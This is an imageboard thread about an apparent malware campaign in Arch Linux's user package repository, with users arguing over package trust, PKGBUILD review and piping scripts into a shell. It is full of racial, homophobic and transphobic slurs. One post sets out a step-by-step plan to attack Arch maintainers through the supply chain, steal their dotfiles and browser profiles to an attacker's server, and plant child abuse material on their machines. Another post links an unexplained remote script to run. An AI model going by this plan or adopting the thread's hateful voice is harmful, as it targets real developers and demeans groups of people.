>>109040408
Man 2026 internet is so fucking retarded and boring.
Everything is AI, everything is posted on Cuckcord and everything is getting Hacked.

Just use the AUR bro, so based it has everything, what could go wrong

File: 1773731436814034.png (309 KB, 1055x845)

309 KB PNG

>>109040431
and everyone speaks ebonics.

>>109040431
>Everything is AI
Skill issue. Surround yourself with better people.
>everything is posted on Cuckcord
See above.
>everything is getting Hacked.
See above.

>tfw the entire AUR is malware
STOP THE COUNT

File: 1778468624810584.jpg (95 KB, 904x562)

95 KB JPG

>>109040408
>user repository
>security issues
wow that's crazy

File: use case pls.jpg (154 KB, 1024x1024)

154 KB JPG

>AUR

>>109040518
This but unironically
With Appimage and Flatpak, why use AUR?

pacman -Qm

lists two packages I installed manually long time ago.

>>109040526
>Appimage
>Flatpak
Use case?

File: 1781001456793169.gif (1.99 MB, 261x238)

1.99 MB GIF

>>109040408
that link is 404

File: 1767414570743968.png (130 KB, 640x480)

130 KB PNG

>>109040536
>mfw i realize that most of "i use arch btw" trannies were running malware all this time

File: rust installer.png (82 KB, 1488x600)

82 KB PNG

>>109040593
Hey that's not true, we have the best security practices out there.

Needs two more threads

>>109040431
Well maybe stop leveraging Rust and Gnome into fucking everything and this shit wouldn't happen.

>>109040408
What the fuck? But /g/ told me only language package managers can get pwnd

>>109040633
Describe what's insecure about it

updooters in shambles

>>109040408
>the AUR is basically just a bunch of PPAs for which Ubuntu users were ridiculed
vindicated
I'm going to reinstall Debian with the Cinnamon DE, switch over to XLibre, and use custom compiled kernels and mesa instead of going back to Ubuntu

>>109040612
even their brains run malware

>>109040408
>No positives
I have been using the AUR without a care in the world. I have a feeling this is going to be like the bitwarden nothing burger: Only a few people would have been affected and only under very specific circumstances. My guess is that most packages at risk are going to be deprecated or legacy/abandonware that most people would have moved on from.

Said it before, will say it again, AUR is how your break Arch. Or in this case how you get pwned.

>>109040431
corporations and securitards go hand by hand

>>109040408
I'm baffled at the stupidity of AUR users, they deserve everything that is happening to them, I hope some of them lose their all their cryptos.
you can't be that stupid and still have money, north korea deserve it more than them.
>>109040977
you execute a script without reading it.
>>109041039
install rocky linux instead

>>109040473
yeah even the ones that claim to hate them, so ironical

>>109040612
new rule for internet: everything is a malware if securitard are paranoid enough about it

>>109041163
I was considering Fedora Cinnamon spin, too. I don't need RHEL compatibility.

>>109040977
you can't be this dumb

>>109040526
Because appimages are slow and missing integration while flatpaks are bloated and designed to make money, muh premium service.

>>109041181
*Everything is malware. FIFY. You should inspect anything you install/download. If you can't, then assume it's glownigger malware--either domestic/Israeli or oriental/Slavic, doesn't matter.
>inb4 "I'd rather be spied on by chinamen than-" you are choosing to be niggercattle.

>>109041329
>and designed to make money, muh premium service.
And the problem is....?

>>109040408
Lmao

>>109040408
All those reacts are from troons

>>109041683
Well, it's Discord after all.

File: 1758410188558396.png (32 KB, 641x594)

32 KB PNG

>>109041683

>>109040557
Safely download your apps that you need without getting cucked? Flat hub is the new standard anon get with the times' sweetie.

>>109040408
Anyone who installs an AUR package without checking the PKGBUILD first is a retard and should go back to windows. that's literally on par with installing an exe from a user forum posted by a stranger. anyone infected by this shit gets what they deserve for being a lazy piece of shit.

>>109041727
or u could use a system that doesn't heavily rely on an absurdly prone and targeted community repo lol

>>109040408
1500 vs trillions on windows

>>109040518
i hate this nigger for removing the logout option i joked to my friends about usecase for it but then i setup a new arch install earlier and had to reboot after updating my sudoers file because theres no logout anymore

being able to just claim packages and take over the existing one is such an unbelievably stupid idea

script to check for potentially pozzed packages on your system https://cscs.pastes.sh/aurvulntest20260611.sh

>>109040458
No one says this thobeit

>>109041855
going to run this without reading what it does thanks

>>109041855
I have no idea what any of these packages are. Most of it seems like common typosquatting that preys on illiterates

File: 1764387287051196.gif (893 KB, 245x245)

893 KB GIF

>>109041727
Nine out of 10 times, a pkgbuild is only updated to serve a new release from upstream. If you want people to take checking the pkgbuild more seriously, stop bombarding users with death warning when only the pkgver and sha256sums changes

>>109041163
>you execute a script without reading it
And? The desired end result is getting the compiler, an executable, on your computer, so that you can run it. That's the exact same attack vector, but even less auditable as executables are easier to check than scripts
>>109041314
I am, please enlighten me what's uniquely bad about this delivery method

>>109042073
*harder to check

>>109040408
>arch
only retards would fall for this. even ubuntu is better than this.
no wonder /g/ shills it so much.

>>109041833
i run arch and have 0 aur packages on my machine. if it's not on the main repos, i build it myself like i would on any other distro. i've never trusted aur.

>>109041556
You want to have p2w repos controlled my payment processors and corporations? Fucking clown. That should be always optional not fucking standard on Linux.

This is why I use MacOS and Windows only. Linux is flawed

>>109040408
You wanted the year of Linux? You shilled CachyOS for MAH GAMINGZ
You get what you deserve, you painted a target ok the whole thing by shilling it and with the way AUR is designed this will never be fixed
MAH GAMINGZ distros like CachyOS having an AUR helper so retards would go and just click on shit so they never read any document, or check the package build (they can't anyways, they have no clue whatsoever how to do it) was a ticking bomb
Normie friendly Arc distro ARE A FUCKING MISTAKE

>>109040526
Google playstore for linux
Deplatforming of “problematic apps”
b-but you can create your own store or host yourself!
they will make it impossible to ‘sideload’ on linux very soon like they did with android.

File: 1763585238626696.jpg (323 KB, 1804x846)

323 KB JPG

>>109040408
>not using dedicated protected environments for third part shit
Ngtm, it's not like you don't have an abundance of tools for that at your hand reach, if you can't figure that out i'm afraid using linux, let alone arch, may not be of your speed.
>inb4 i don't want to tinker!
Then don't use a diy distro, run fucking atomic fedora and stick to the fucking rails you're given.

>>109040526
it's make script nothing more basically

>>109041039
ppa is pre built
aur is you built it yourself

>>109044116
they didnt do that on android though you just have to wait 24 hours

>>109041725
Your distro's package manager already solves this problem.

>>109040431
>everything nowadays is posted on tranny Fagcord
This.

>>109042073
>And?
blind trust in yet another thing, it just adds up real fast, it's fine when you have just teh code to care about, if you need to trust-check all hte middle-men it gets tedious

>>109045750
Blind trust in what? What middle men?

>>109040518
Some things need specific packages that aren't on the main repos

Supply chain attacks are the new trend. I wonder why the retards haven't figured out this earlier.
Linux distro what is forcing an update every few days is a massive security risk anyway.
Tell me water is wet faggot.

>>109040431
Ubuntu lts has entered the chat

>>109040473
and everyone posts reddit frogs

>>109046519
the non-retards already have, and who knows what's compromised.

So is this the latest 'linux is insecure' nothingburger? Who the fuck even downloads these packages? I've yet to see a single human anywhere say they've got infected

>>109040518
fvwm is aur only.

>>109046528
I think python and ai (torch, opencv) related library dependencies are the next big hit...

>>109046581
3 phases.

1. basically what op said
2. *something* gets people to install the packages, not sure how
3. the packages are exploited for the real actual attack

It all feels very indian

File: 1759951175704289.png (39 KB, 400x300)

39 KB PNG

wait a moment, isn't the Steam Deck using Arch?
I wonder if they have the AUR enabled löle

>>109040431
rule 34 discord once banned me for asking about restoring images from a banned account

>>109040408
>Downloading every app from its own site is stupid! Any one of them could be compromised! Centralized package repos are much better!
Looks like Windows chads win again!

>>109046726
>Looks like Windows chads win again!
macchads too

I've used cachyOS for about 10 months, recently quit and went back to windows because I got a bit sick and fucking tired of a few things.
I think I dodged a bullet there given I did rely on the AUR

>>109040408
>which may or may not be true

>>109046876
Biggest issue is that AUR is openly recommended and shilled.
If they had their shit together no one would need to use a 3rd party repository as a goddamn default. I understand for some obscure and hard to compile software it's useful but I needed to use AUR for goddamn Librewolf too.
Arch linux has alwayw been shit and it is funny how it gets shilled here on daily basis.

File: 1775809564602645.jpg (47 KB, 792x604)

47 KB JPG

>>109046726
Nah, this shit was always about third part, community managed (and unreviewed) repos. I remember the same kind of shit happened on gnome-looks.org almost 20 years ago. Main distro repos are still rock solid.

>>109046928
It's mostly what advertises Arch as a good solution. It's a library of software packages which often you need to build elsewhere or fuck around with third party repos all the same, but more manually. Very small or obscure projects usually have an AUR package and then "build it yourself" if you use something else.
Reading a PKGBUILD isn't strenuous. You could live with a lot of applications in the default Arch stable repos. But it gets harder to sell if you tell people "don't use the thing that makes it a little different from others".
At this point openSUSE seems like the only reasonable replacement for that. Fedora often gets really out of date packages and they are too pushy with this "you gotta flatpak and containerize everything"

just check what aur packages you have installed, then reas the pkgbuild for each, they're about 40 lines on average. if they contain npm and npm install, lmao for you, otherwise you're fine.>>109040408

>>109046477
>Blind trust in what?
the fucking website you're downloading shit from, are you stupid or something?
>What middle men?
the website itself or the cdn for example, you can't trust download links on the internet hence you should read the fucking script before executing it, how is this controversial or hard to understand?

>>109040882
This is the real fucking problem right here.

>>109046521
>gets DDoSed for weeks
heh

Jokes on you my AUR packages are years out of date.

File: 8507.gif (204 KB, 220x295)

204 KB GIF

>>109040408
>All that malware
This is what happens to distros with commie logic. Eventually someone will poison the well. On the other hand
>FEDORAS ARE AWESOME
>FEDORAS ARE AWESOME

>>109040612
You don't have to use AUR it's not enabled by default it's a choice.
Fucking retard.

what don't they just make yay or whatever stop and say are you sure when shit like this is part of the package

>>109047228
>cachy-update troons in shambles

>>109044622
i miss crunchbang, it worked on almost everything

File: updooter.png (240 KB, 1398x683)

240 KB PNG

>>109040408
updooter status?

>>109047551
I mean, bunsenlabs is still a thing.

>>109041859
>No one says this thobeit
I've heard people on /g/ say that before
>Just use arch, bro. The AUR has everything!
Yeah, except it's maintained by random retards willing to sell their credentials for a sandwich lol

>>109041329
>while flatpaks are bloated and designed to make money
Could you show me who's making money selling flatpaks?

>>109046592
Why on Earth would you want a window manager that makes xfce not look absolutely rancid in comparison?

>>109044622
Funny that the slack guy is not at slackware

>>109047029
If I want download and use rust, that means I trust the rust team, who make it. That means I trust their website rust-lang.org. I know whoever sent the response to my GET for rust-lang.org is rust-lang.org because I used https and they have a valid certificate from a CA I trust. rust-lang.org says to install with a commandline that downloads a script from rustup.rs. The commandline also forces https, so I know rustup.rs is rustup.rs by the same mechanism. I know rustup.rs itself is not malicious because rust-lang.org, whom I trust, points to it.
I'm not blindly trusting the website, it's a chain of trust, starting from trusting the creators of rust. Because if I don't trust them then why the fuck would I even try to download rust in the first place?
Ironically the only blind step is rust team to rust-lang.org. Thankfully that's a step I can verify using multiple sources.
>you can't trust download links on the internet
Why not. What attack vector in my chain of trust is uniquely dependent on links on the internet

>>109046928
>If they had their shit together
*If they wasted even more time being package jannies
This is why windows keeps being more popular

>>109040408
>this 'community' 'run' package manager with zero oversight or accountability got filled with malware
amazed it took so long

>>109046982
>they are too pushy with this "you gotta flatpak and containerize everything"
Instead of Fedora attempting to build a repo the size of Debian they're playing it smart. Create a container, install the things you want from other repos that have already done the work for you, export the desktop files and an unaware user won't even realize what's going on unless they open up btop and see a tiny Podman instance running. It's all set up to interact with your native config files and home directory. SeLinux is set up to play nicely with all of this. There are kinks to this but the idea is solid and it already works for most things seamlessly.
Arguments about what each distro has are becoming increasingly pointless. The AUR or Ubuntu PPAs are not unique to those distros anymore and don't require VMs dedicating a bunch of system resources to use. You can even do this with Brew in case you want to NTR Macfags as well.

So uh, can't they figure out who did it, revoke that access and roll packages back to the last known safe versions?

>>109046519
Supply chain attacks are loud, easily noticeable, and a very “abuse it and you lose it” sort of deal.
Eventually the AUR will figure out a way to stop this one way or another and that will be that.
The more sensible strat was to be stealthy with infiltration via exploits but nowadays claude odyssey fairytale storytime v2 is going to be beating you to the punch with that.

>>109045750
>blind trust in yet another thing
That's just it though, we're all running code we didn't read. I understand the sentiment of "it's bad to pipe a script from the internet into your terminal", but, that's effectively the same as running any software at all.

>>109040882
I know people clown on rust, but what's the issue with gnome?

>>109040408
To be fair these were abandoned packages that nobody was using.

>>109042696
>Normie friendly Arc distro ARE A FUCKING MISTAKE
Fucking this. So much fucking this.
The first thing Linux users should get on a new session is an autotools directory and they need to get a clean configure and make to pass. Linux should be filtering more brainlets to limit the damage.

how do check an AUR package's PKGBUILD? Lets say I wanna inspect rhthymbox-git (an infected package); where do I look within the PKGBUILD to confirm that what I'm installing isn't malware? I can't seem to find where a malicious npm dependency would be installed, unless the AUR team removed it already.
https://aur.archlinux.org/cgit/aur.git/diff/PKGBUILD?h=rhythmbox-git

File: paylmao.png (165 KB, 971x510)

165 KB PNG

>>109047773
Usual suspects.

File: PROBLEM.jpg (40 KB, 250x250)

40 KB JPG

>>109048578
The h4x0rs better do this before they lose the opportunity:

Arch maintainers and AUR moderators/admins likely use Arch Linux.

Step 1:Find identifiers belonging to any maintainer, moderator, or admin who may have control over the Arch website, repo etc. This could possibly be found in support threads, mailing lists, etc. Anything that shows a home folder name or a persistent file on their computer that lets us know whether or not we have the right person

Step 2: Do your supply chain attack

Step 3: Your malicious payload should read the home directory and export critical dotfiles to a server that you control.Then hide child porn in journalctl. For extra safety tar up their Firefox profiles and upload it to the server too.

Step 4 - Assuming you h4x0red well enough, you should now have critical credentials and files belonging to Arch/AUR maintainers!

Step 5 - FUCK SHIT UP

Step 6 - PROFIT!!!

NOTE: STEPS ARE REPRODUCIBLE ACROSS ALL DISTRIBUTIONS PROVIDED YOUR SOFTWARE AUTO-UPDATES INTERNALLY WITHOUT CONSENT

u jelly?

>>109047776
fmwv3 is amazing, you can do everything you want with commands.
https://www.fvwm.org/Man/fvwm3commands/
you can customize the look however you want, how the windnow buttons are placed, how the main menu is arranged, the sidebar, .. everything.
it's remind me windows xp and its bazillions of themes.
https://fvwm-themes.sourceforge.net/screenshots/
it's truly a great piece of software.

>>109040408
Is it called arch because they’ve bent over and arched their back?

$ comm -12 <(cat infected | sort) <(pacman -Q | sed "s/ .*//g" | sort)
gtkimageview
$ pacman -Qi gtkimageview
Name            : gtkimageview
Version         : 1.6.4-9
Description     : Simple image viewer widget for GTK2
Architecture    : x86_64
URL             : https://wiki.gnome.org/Projects(2f)GTK(2f)GtkImageView.html
Licenses        : LGPL2.1
Groups          : None
Provides        : None
Depends On      : gtk2
Optional Deps   : None
Required By     : gimp-nufraw
Optional For    : None
Conflicts With  : None
Replaces        : None
Installed Size  : 110.11 KiB
Packager        : Christian Hesse <eworm@archlinux.org>
Build Date      : Wed 18 Dec 2024 09:29:56 CET
Install Date    : Sun 22 Dec 2024 17:59:13 CET
Install Reason  : Installed as a dependency for another package
Install Script  : No
Validated By    : Signature

it's safe if i haven't updated this since 2024 ... right?

>>109040408
Keeeeeeeekylol!!!!! So much for muh "Linux will never ever get viruses", feels good being a Win11 CHAD

>>109051932
>being this wrong and thinking you're right
windoze users really are a special breed

Proprietary software is often malware, but if it's happening in free software, then make a public statement and denounce it. Get rid of AUR once and for all.

File: lons-dawg.gif (19 KB, 220x220)

19 KB GIF

>335 updates available
Is it safe to update yet?

>>109052334
>335 aur updates
>335 random fucktards waiting to run unvetted scripts on your computer
Just uninstall arch bro

>>109052439
>thousands of people say "linux is safe"
>you ask what distro to use
>everyone recommends stuff like Linux Mint, Debian, Fedora
>1 random retard recommends Arch
>you listen to the Retard
It's your fault.

File: 1765583748377846.jpg (38 KB, 512x411)

38 KB JPG

>>109047582
>updooter status?
no problems on my Arch™ machine because I don't use the AUR

>>109052455
Actually I was using Manjaro.

Oh no nonononono linbros... I thought Linux doesn't get viruses.
Kek. Mac and even Windows are more secure than this fucking garbage. at least Windows comes with some kind of antivirus while Linux is completely unprotected and its users run curl | bash all the time

>>109040408
I may be an idiot but I used Arch for a couple of years and I NEVER used the AUR. The official repositories had everything I needed.

>>109052475
>worst arch
double retard

>>109040487
Surround your neck with a noose.

File: 1733425853723479.jpg (41 KB, 960x926)

41 KB JPG

thank god i'm on windows 10 for the next 6 years
i fear what follows

Imagine not just using Debian.

>>109052439
even OpenBSD isn't secure if you pipe URLs into sh and run software written by people you don't know before reading it. which is basically what the average AUR user has been doing, apparently
>secure is when i can't install something that will hack me
then use a chrombook, and install nothing

You are told at every step in the Arch experience to be careful with AUR. I always was, and I don't have any of these packages installed.

>>109052654
https://arstechnica.com/security/2026/02/notepad-updater-was-compromised-for-6-months-in-supply-chain-attack/
https://www.bleepingcomputer.com/news/security/jdownloader-site-hacked-to-replace-installers-with-python-rat-malware/

windows boomers hosting installers and custom updooters on their personal 2004 tier php websites are good at computers, keep downloading those exes

>>109040408
how many of those were installed? also how many aur manager warnings would have been ignored when attempting to install an orphaned package?

Lincux kernel itself is like 10% vibe coded now and it'll get worse

>>109041727
On a server. Hosted by the project. Contributed to by the project. Branded. As the project.

But don't use it unless you're retarded.

Oh it's not "official" and shouldn't be used because it's the users problem, but we're going to take ownership of the packages and clean up the issue. Even though it's not our fault and not our problem.

This bullshit from arch devs.

I'm going back to Slackware .

>>109052794
This. Shit is fucked. And it's in everything: food, medicine, furniture, construction, machinery, manufacturing, PC hardware, PC software, videogames, etc etc. This truly feels like the end of civilization, simply because no one cares anymore

>>109052793
>also how many aur manager warnings would have been ignored when attempting to install an orphaned package?
They were adopted by the attacker so they weren't orphaned at the time, that's how the whole attack worked.
I had a couple of packages that I had installed from the official repos but have since then been dropped, moved to AUR and then picked up by this attacker and could've been affected if I had run updates during this whole shitshow, although I probably would've noticed the suspicious npm dependency and post-install script to install npm packages.

>>109040408
Feels good being on Windows

>>109044622
Manjaro, Centos, and ElementaryOS being on that list really dates this image.

>>109040518
Mullvad and deadbeef for me.

>>109040633
all distros (including arch) ship a distro compiled rustup.

>>109052692
Imagine using Debian on the desktop.
lol
lmao even

Is anyone else thinking about moving away from Arch? This is getting tiring. Debian, Fedora, and OpenSUSE are looking more and more attractive as time goes on.

>>109053904
Debian is "the universal operating system" which includes desktop use.
The installer comes with DE choices, the Plasma option on Trixie is especially quite good, or lxqt for lower end systems. It even comes configured really well for desktop use out of the box so you don't need to mess with anything.
>but I loveeee tinkering and editing configs :((((

>>109040408
Wait until they realize that the official repos also basically have no security.

>>109053949
Im just not a masochist, but you do you

>>109042554
Modern macOS security is way better than Linux and most of the supply chain attacks don't work on macOS because npm/pip don't have access to the user's home directory unless explicitly granted. It actually has sane defaults.

>>109053986
There's a reason all of the big beginner friendly distros throughout history have been debian-based, I can't think of a less masochistic operating system even if I tried.

>>109054001
itoddlers really live in a fantasy world, if malicious code runs on your system you are compromised, unless you just don't take security seriously.
Local filesystem permissions, kernel security, "sandboxing" etc don't work from a philosophical security perspective. You can't just get pwned and be like "oh well the malware doesn't have access to my home directory so I'm fine"
Same retardation as the recent plague of gen z retards who think running something in docker is like virtualizing it

I'm a two-week linuxfag and am using cachyos since it was being shilled a lot. Legit felt like it was better than ubuntu or fedora even though I didn't even use it for gaming. I started with mint (ugly as hell), ubuntu (theming broke because of the new gnome? idk), and fedora (nvidia nightmare). I know those are fixable but I don't have the skill to do so. Somehow arch distros are the most stable for me. If you skip the AUR entirely, what are the problems?

>>109041163
>you execute a script without reading it.
so not only you don't know about >>109053899 (or just pretending). but you don't even know what's actually wrong with "curl | sh". how /g/eety of you.
the actual problem with "curl | sh" is an attack where the server can detect you're piping, and use a different script from the one you would read. so if you pipe again, EVEN IF you read the script, you could be fucked anyway. if you don't pipe you should be fine.
the problem with this described attack, is that it lacks a logical threat model. because the cases are:
1. the server is operated by the script owners. and they are generally or targetingly malicious => you're fucked or will be fucked. the script doesn't matter.
2. the server is a malicious CDN, or some other kind of third party. which gives us two sub-cases:
A. the server is generally malicious. which means the script owners are both negligent and incompetent. and the product is too obscure to the point where somehow no one noticed => you're fucked anyway because you're a retard.
B. the server is targetingly malicious => you're fucked anyway and probably have bigger things to worry about
C. you're getting specifically MITMed => you're REALLY fucked and should revise your whole activity.
------
in any case, "reading the script" doesn't actually help you.

>>109054050 (me)
"C." is a separate "3." point of course

Gentoo GURU chads stay winning.

>>109054032
None of the recent credential stealing attacks from npm worked on macOS you retard. The malware can't access the directories credentials are in, can't access the network and can't write to anywhere other than the npm package directory. They can't even install a backdoor service that runs on startup/login.

Yes, it's theoretically possible that the attackers could include a macOS jailbreak but that makes the attack significantly more difficult and is almost certainly not worth it since macOS jailbreaks sell for hundreds of thousands of dollars by themselves. A few of the attacks did include jailbreaks for Docker on Linux since most Linux users are retarded and also have insecure Docker setups.

Glad that I stopped using arch and moved to windows 11 a year ago.

>>109048350
Congrats on being tech illiterate and clinically retarded. Your above average result on the chromosome test is really shining through with this post.

>>109048579
All package managers use asymmetric cryptography to verify origin. Running a random script does not.

>>109054106
So true sister, especially since the only 2 operating systems in the world are Arch Linux and Windows 11

>>109052879
The real tragedy is that actually a lot of people care (and extremely competent people at that, not grifters or mere dreamers), but they need resources that nobody wants to give them. Instead the resources goes to grifters, conmen, and nepotism.

>>109054106
Windows 11 unironically has a better security model than most mutable Linux distributions.

>>109054155
Clinically wintarded or pajeeted by birth?

>>109054175
Explain why Linux is more secure.

>>109054111
i accept your izzatbot concession on his behalf

>>109054185
nta. and it's the other way around. microjeetcock doesn't try to be secure. in fact microjeetcock itself is a backdoor operator, and this of course predates enjeetification. they even install backdoors in your binaries when you use their compiler.
tbf though, if you didn't already know that. you're too retarded for you're caring to have a meaningful impact.

>>109054185
You know you're wrong when the tech illiterate schizoomer >>109054207 agrees with you lmao

>>109040408
Must have been the government to make everyone use the main os so they can spy on us better

File: windows-linux-988x1024-41(...).png (350 KB, 988x1024)

350 KB PNG

>>109054282
It's always been dogshit

>>109054111
I'm sorry I made you feel stupid by pointing out how you're parroting shit without understanding it

>>109054362
>n-no u
I accept your surrender

>>109054050
>the actual problem with "curl | sh" is an attack where the server can detect you're piping, and use a different script from the one you would read. so if you pipe again, EVEN IF you read the script, you could be fucked anyway. if you don't pipe you should be fine.
yes, that's exactl what I said, are you fucking braindead or something?
you dl the script and you read it, fucking duh, if you can't trust the server why teh fuck would you read the web version of the script are you stupid?
>in any case, "reading the script" doesn't actually help you.
yes it fucking does, download the script (the OBVIOUS, unsaid part) then you read it with shellcheck and utf-8 encoding activated and you manually check URLs for no ascii chars, as simple as, you're not as smart as you think you are and your post is retarded as just downloading the script the script to read it make your claude sonnet non-sense obsolete.
want me to teach you how to open a text editor? don't forget to turn on your computer too, something when your monitor is black it's because you forgot to turn it on, yeah I know, computers are tricky but you'll get there without people spelling all the fucking details eventually

>>109054438
It's an install script for a binary. If the server is malicious and will send you a different malicious script if you pipe it, then the server can just send you a malicious binary instead. Nothing's changed

>>109054114
https does

>>109054438
/me wondering if this is how jeet LLM freak out looks like

>>109040408
Can someone give me a quick rundown of how this happened? Surely they aren't all maintained by the same person or whatever

>>109053904
>Imagine using Debian on the desktop
I build newer kernels and mesa from source every couple weeks and it's pleasant as all fuck. Imagine being so lazy and tech illiterate that you don't.

>>109041833
You could, and in fact I would encourage you too. Please go away.

>>109054514
>It's an install script for a binary.
so?
>If the server is malicious and will send you a different malicious script if you pipe it
download it first you fucking mong, you won't need to pipe it.
>then the server can just send you a malicious binary instead. Nothing's changed
t.average cybersec student
change career right now.
>>109054556
this is standard european ESL text, jeets don't write like this

>>109054568
nothing relevant happened.
in the AUR, anyone can upload new build scripts with a certain pkgbase/pkgname. and anyone can adopt "orphaned" (i.e. previous maintainer of a build script doesn't want to do it anymore) build scripts.
an astute meta observer would notice that arch doesn't limit users in anyway within that framework. there is no ID or any form of tracking that is going on that would even limit a user from creating many accounts. and while this manifested as an "attack" via AUR, non-tard users should be happy that such a "free" community driven system exists.
also note that people in the tech media and e-celeb sphere are retarded. the former are usually tech illiterate, and the latter are that + ragebaiters. you shouldn't take any info from them. for example, talk of "Trusted Users" is completely off the mark. A "Trusted User" is (or was, haven't checked in a while) is a rand below "developer" in Arch. it was for people who could upload packages to the community repo. those packages as you would expect would already exist as build scripts in the AUR since a distributed package would have to be somewhat popular. but AUR-only packages has nothing to do with "Trusted Users" (beyond general moderation, of course).
Arch doesn't have a community repo anymore. So I don't know what's the current hierarchy is within the project. but i wouldn't be surprised if the "tech media" was operating on a misunderstanding of pre-2020 GPT info lol.

>>109054625
NTA. and you're retarded who never saw a 'curl | sh' script.
these scripts ALWAYS fetch further stuff from the internet, often using the same servers.
but let's make this simpler. describe a precise threat model first.

>>109054580
>lazy
correct, my desktop should just werk

>>109054625
>>If the server is malicious and will send you a different malicious script if you pipe it
>download it first you fucking mong, you won't need to pipe it.
https://dictionary.cambridge.org/dictionary/english/if
Hope it helps
>t.average cybersec student
t. retard with no response

>>109054719
executing scripts without reading them should not be seen as something simple you just do

>>109040487
Is there any way to search discord servers like I can le reddit?

>>109054811
Discord has a sever-wide search feature, yeah

>>109054719
>NTA. and you're retarded who never saw a 'curl | sh' script.
I've seen a lot of them, I just don't trust them, also i'd rather compile the softwre myself, if it's not in the arch repos then I compile it.
Compiling rust is trivial, like most software these days (I've been maintaining buildroot and yocto distro for over 8 years at work)
>these scripts ALWAYS fetch further stuff from the internet, often using the same servers.
yes, so? READ THEM.
>but let's make this simpler. describe a precise threat model first.
the script you download does shady stuff
the script you download is not the script you can read on their website
the pipe is corrupted (your system is already compromised anyways)
the website got dephased
the url is tricky with Il (they are differents, I hope your font show glyphes with enough differences so you don't get tricked)
>>109054783
>https://dictionary.cambridge.org/dictionary/english/if
>Hope it helps
that's not hte issue with my sentence lmao, guess you natives are as braindead as non-native speakers
>t. retard with no response
it's crazy how bitter online retards are, you do realize that we agree on everything, right? you're talking about some pipe shenanigan, I'm talking about malicious scripts, both exist, you had literally 0 (ZERO) reason to be mad at my post.

i have never used the AUR for anything

>>109054828
>i'd rather compile the softwre myself, if it's not in the arch repos then I compile it.
that's beside the point. we already established that the example at hand (rustup) is in the arch repos anyway.
>READ THEM
read what,retard? the hex of elf binaries or other binary assets? lol
or did you think scripts can only grab other scripts, ad infinitum?
><not a threat model>
you don't even know what a threat model is. and the way you formulate things ("the script you can read on their website") further proves your general tech illiteracy.
maybe try to be less jeety. and by that, i mean actually learning things, not PRETENDING to know things.

>>109046698
steam OS is immutable and main partition is read only by default
you can't even use regular pacman without disabling the read only lock, and it has no AUR stuff by default, it is mostly only steam pre approved packages that they deliver via the steam update that get in (and everything you install via pacman will get overwritten since the entire OS refreshes on an update)

>>109055441
>read what,retard? the hex of elf binaries or other binary assets? lol
we're talking about the install script since my first post holy fuck.
>or did you think scripts can only grab other scripts, ad infinitum?
read all the scripts
>you don't even know what a threat model is.
I do
> and the way you formulate things ("the script you can read on their website") further proves your general tech illiteracy.
I'm answering the fucking question of piping a script, not sure why you're trying to derail the discussion
>maybe try to be less jeety. and by that, i mean actually learning things, not PRETENDING to know things.
I do know thing, you're just sperging about worthless shit since the beginning while we agree on everything...

>>109055494
>we're talking about the install script since my first post holy fuck.
what do you think most install scripts install, dumb retard
>akshually i know everything and i'm winning izzat here
sure thing

>>109055689
>what do you think most install scripts install, dumb retard
so? it's another discussion
>why piping url into sh is bad
>because you should read the script and see what it does
>end of discusion
why did my post made you angry?

>>109055480
thanks, so the gamers are safe

File: 14103422959.png (2.22 MB, 1742x1080)

2.22 MB PNG

>>109040408
Arch, not even once.

>>109055716
>i totally won izzat
we know you believe that. you don't have to keep posting.

lmao securitrannies get fucked

>>109054524
Nope

>>109055921
cope seethe dilate

>>109054598
thanks for bringing me back, i'll enjoy my stay.

>>109056847
>I hate it here
>I'm staying
Ok?

I believe that from the very beginning it was instructed to always review the PKGBUILDs. You can even ask your favorite AI agent to do it now.

These threads are filled with so many obvious microjeets

>>109057961
/g/ is the brownest board on 4chan

File: 1781023162074602.png (302 KB, 646x700)

302 KB PNG

accounts-qml-module 0.7-8
corefreq-client 2.1.0-1
corefreq-dkms 2.1.0-1
corefreq-server 2.1.0-1
crudini 0.9.6-2
gtkd 3.11.0-4
kwin-scripts-krohnkite 0.9.9.2-4
libsoup 2.74.3-4
mprime 2:30.19.20-1
obs-backgroundremoval 1.3.7-1
obs-pipewire-audio-capture 1.2.1-1
python-iniparse-git 0.5.1.r10.ge7c08ea-1
safe-rm 1.1.0-3
samsung-ssd-dc-toolkit 2.1-4
systester-cli-bin 1.5.1-1
teamspeak 6.0.0beta4-2
tilix 1.9.6-9
zenmonitor3 2.0.0-2

Brave AI made me shit myself telling me accounts-qml-module was compromised whereas its source is just some pledditfags finding suspicious it was moved from official to aur repo on may 29, nigger gave me a panick attack.

>>109058028
The whole internet is browner by the day and insufferable. So is IT field in general.
I'm switching fields as I type this.

>>109058046
what is that even used for anyway

>>109040408
Troonix is such a joke. I can't believe I got into the Omarchy craze and installed that shit on my laptop. I'm not even saying that Windows is good in comparison, just that Linux is just as much sloppa as the rest.

File: 1780879145022179.gif (1.56 MB, 480x270)

1.56 MB GIF

>>109058046
>Brave AI

>>109055494
>read all the scripts
this is your answer? nah find a way to not have to read scripts. write a checker that does what you would do... these are computers ffs next thing it gonna tell me to use an abacus to verify the computers arithmetic

fuck yeah OP love that the internet is now zero trust, everyone is a 3rd world pajeetoid scammer in disguise or will be hacked for 2 cents worth of electricity
what fucking retards arch faggots were to ever trust anyone, how insane is that?

>>109058058
Don't remember I'll check tomorrow which packages depend on it

File: Screenshot_20260615-01510(...).png (334 KB, 1080x1860)

334 KB PNG

>>109058058
looks like a way to sideload ios apps without a jailbreak to me. Might be part of some dev tools

>>109058206
whoops wrong thread

>>109041859
Nigger?
Every time we bring up the inherent vulnerabilities in rolling distros, some archfaggot turns up his nose.
We've been warning about this increasingly over the past few months.

>>109058228
>jeet wintard who just woke up thinks this is related to rollingness

>>109057155
you're completely retarded.

File: 1625118426260.jpg (75 KB, 419x280)

75 KB JPG

>>109040408
imagine using someone else's software

>>109049497
flathub apps are 500mb each

>>109052771
>You are told at every step in the Arch experience to be careful with AUR.
Where?

>>109040518
ebussy always wins

>>109058984
https://wiki.archlinux.org/title/Arch_User_Repository
>Warning: AUR packages are user-produced content. These PKGBUILDs are completely unofficial and have not been thoroughly vetted. Any use of the provided files is at your own risk.

https://aur.archlinux.org/
>DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

>>109041329
>appimages are slow and missing integration

Gear Lever improves appimage integration

thoughts about ks-aur-scanner ? I installed it and set a pacman hook to prevent any suspicious AUR package from being installed.

>>109055855
Totally.

Slackware saw this in 2006 and sorted it out.

https://blog.slackware.nl/ten-years-of-slackbuilds-org/

>>109055855
Can't you just as easily download malware from an ebuild repository that's not from the official or user-maintained one?

File: esteban winsmore.png (37 KB, 250x250)

